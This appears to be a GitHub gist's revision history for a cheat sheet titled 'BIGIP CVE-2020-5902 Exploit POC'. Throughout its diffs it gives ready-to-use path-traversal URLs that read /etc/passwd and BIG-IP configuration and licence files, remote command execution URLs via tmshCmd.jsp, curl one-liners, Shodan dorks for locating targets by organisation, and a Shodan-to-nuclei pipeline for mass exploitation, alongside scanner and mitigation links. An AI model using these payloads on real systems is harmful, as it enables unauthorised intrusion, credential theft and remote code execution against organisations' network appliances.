-
-
Save carlton0521/2d7ebbc0d077eb680aa78fc52ffa3550 to your computer and use it in GitHub Desktop.
Revisions
-
cihanmehmet revised this gist
Jul 8, 2020 . 1 changed file with 18 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -29,10 +29,16 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ```yaml https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ ``` ## 🔸RCE 💦 ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` ```yaml https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🎯 Manuel POC 🔥 ```ruby @@ -76,12 +82,12 @@ nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ## 🚩CVE-2020-5902 Scanner Python Script ⭐️🚩 https://github.com/jas502n/CVE-2020-5902 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner ## 🌐 Online BIG-IP F5 CVE-2020-5902 Checker ```diff @@ -103,9 +109,18 @@ https://github.com/rapid7/metasploit-framework/pull/13807# https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 ## 🚨RCE 💢 https://twitter.com/chybeta/status/1279807030740516865?s=21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/ ## 📝K52145254: TMUI RCE vulnerability CVE-2020-5902 Mitigation https://support.f5.com/csp/article/K52145254?sf235665517=1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## Explaining CVE 2020-5902 and how to mitigate https://www.youtube.com/watch?v=-_v8D4MWPCc -
Jul 7, 2020 . 1 changed file with 5 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -29,7 +29,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## 🔸RCE 💦 ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` @@ -105,3 +105,7 @@ https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf0 ## 🚨RCE https://twitter.com/chybeta/status/1279807030740516865?s=21 ## 📝K52145254: TMUI RCE vulnerability CVE-2020-5902 Mitigation https://support.f5.com/csp/article/K52145254?sf235665517=1 -
Jul 6, 2020 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -91,6 +91,7 @@ http://threatintel.xyz/F5checker.php ## 💡 Automate Find CVE-2020-5902 🔎 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ` shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ` -
Jul 6, 2020 . 1 changed file with 5 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -41,6 +41,9 @@ curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp? ```bash curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` ` curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | grep -q Vulnerable && printf '\033[0;31mVulnerable\n' || printf '\033[0;32mNot Vulnerable\n' ` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 📜 Nuclei Detect CVE-2020-5902 https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml @@ -88,9 +91,9 @@ http://threatintel.xyz/F5checker.php ## 💡 Automate Find CVE-2020-5902 🔎 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ` shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ` ## 🔨💣 RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# -
Jul 6, 2020 . 1 changed file with 6 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -11,6 +11,12 @@ http.favicon.hash:-335242539 "3992" org:"Organization Name" ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` ```ruby https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp ``` ```yaml https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release ``` ```powershell https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` -
Jul 6, 2020 . 1 changed file with 9 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -46,6 +46,15 @@ nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  ### 🧱🔨 Jaeles Detect CVE-2020-5902 🔋 https://github.com/jaeles-project/jaeles-signatures/blob/master/common/bigip-cve-2020-5902.yaml ```console jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt ```  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🔎 NMAP Script for CVE-2020-5902 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell -
Jul 6, 2020 . 1 changed file with 7 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,12 @@ # 🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## Shodan Seaarch ```console title:"Big-IP®" org:"Organization Name" http.title:"BIG-IP®- Redirect" org:"Organization Name" http.favicon.hash:-335242539 "3992" org:"Organization Name" ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🔸LFI ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd -
Jul 6, 2020 . 1 changed file with 5 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -55,10 +55,13 @@ https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner https://github.com/jas502n/CVE-2020-5902 ## 🌐 Online BIG-IP F5 CVE-2020-5902 Checker ```diff - 🤷♂️ Note: Not Safe(it may be collecting information in the background.) ``` http://threatintel.xyz/F5checker.php ## 💡 Automate Find CVE-2020-5902 🔎 -
Jul 6, 2020 . 1 changed file with 6 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -55,6 +55,12 @@ https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner ## 🌐 Online BIG-IP F5 CVE-2020-5902 Checker 🤷♂️ Note: Not Safe(it may be collecting information in the background.) http://threatintel.xyz/F5checker.php ## 💡 Automate Find CVE-2020-5902 🔎 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ```console -
Jul 6, 2020 . 1 changed file with 7 additions and 4 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ # 🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🔸LFI ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` @@ -16,7 +16,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## 🔸RCE ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` @@ -61,9 +61,12 @@ https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-th shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ``` ## 🔨💣 RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# `modules/exploits/linux/http/f5_bigip_tmui_rce.rb` https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 ## 🚨RCE https://twitter.com/chybeta/status/1279807030740516865?s=21 -
Jul 6, 2020 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ # 🔸BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## LFI ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` @@ -16,7 +16,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## RCE ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` -
Jul 6, 2020 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -65,4 +65,5 @@ shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --s https://github.com/rapid7/metasploit-framework/pull/13807# `modules/exploits/linux/http/f5_bigip_tmui_rce.rb` https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 -
Jul 6, 2020 . 1 changed file with 3 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -63,3 +63,6 @@ shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --s ## 🔨RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# `modules/exploits/linux/http/f5_bigip_tmui_rce.rb` https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 -
Jul 6, 2020 . 1 changed file with 6 additions and 5 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ # 🔸BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## LFI ```console @@ -49,16 +49,17 @@ nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ```  ## 🚩CVE-2020-5902 Scanner Python Script https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner ## 💡 Automate Find CVE-2020-5902 🔎 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ```console shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ``` ## 🔨RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# -
Jul 6, 2020 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -51,6 +51,7 @@ nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ## CVE-2020-5902 Scanner Python Script https://github.com/dunderhay/CVE-2020-5902 -------- https://github.com/aqhmal/CVE-2020-5902-Scanner ## Automate Find CVE-2020-5902 -
Jul 6, 2020 . 1 changed file with 22 additions and 4 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,9 +1,10 @@ # 🔸BIGIP CVE-2020-5902 Exploit POC 👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## LFI ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` ```powershell https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` ```ruby @@ -15,6 +16,10 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## RCE ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🎯 Manuel POC 🔥 ```ruby @@ -42,4 +47,17 @@ wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve ```console nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ```  ## CVE-2020-5902 Scanner Python Script https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner ## Automate Find CVE-2020-5902 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ```console shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ``` ## RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# -
Jul 5, 2020 . 1 changed file with 11 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ # 🔸 BIGIP CVE-2020-5902 Exploit POC 👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd @@ -16,7 +16,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🎯 Manuel POC 🔥 ```ruby curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` @@ -34,3 +34,12 @@ nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  ## 🔎 NMAP Script for CVE-2020-5902 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse ``` ```console nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ```  -
Jul 5, 2020 . 1 changed file with 12 additions and 4 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,12 +1,12 @@ # 🔸 BIGIP CVE-2020-5902 Exploit POC - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` ```console https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` ```ruby https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa ``` ```bash @@ -15,14 +15,22 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🎯 Manuel POC ```ruby curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` ```bash curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 📜 Nuclei Detect CVE-2020-5902 https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml ```console nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt ```  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  -
Jul 5, 2020 . 1 changed file with 10 additions and 4 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,5 @@ ## 🔸 BIGIP CVE-2020-5902 Exploit POC - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` @@ -14,9 +15,14 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 📜 Nuclei Detect CVE-2020-5902 https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml ```bash nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt ```  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  -
Jul 5, 2020 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,10 +5,12 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```console https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` ```diff https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa ``` ```bash https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license ``` ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` -
Jul 5, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,20 @@ ## BIGIP CVE-2020-5902 Exploit POC ```powershell https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` ```console https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa ``` ```bash https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## Nuclei Detect CVE-2020-5902 https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml ```bash nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt ```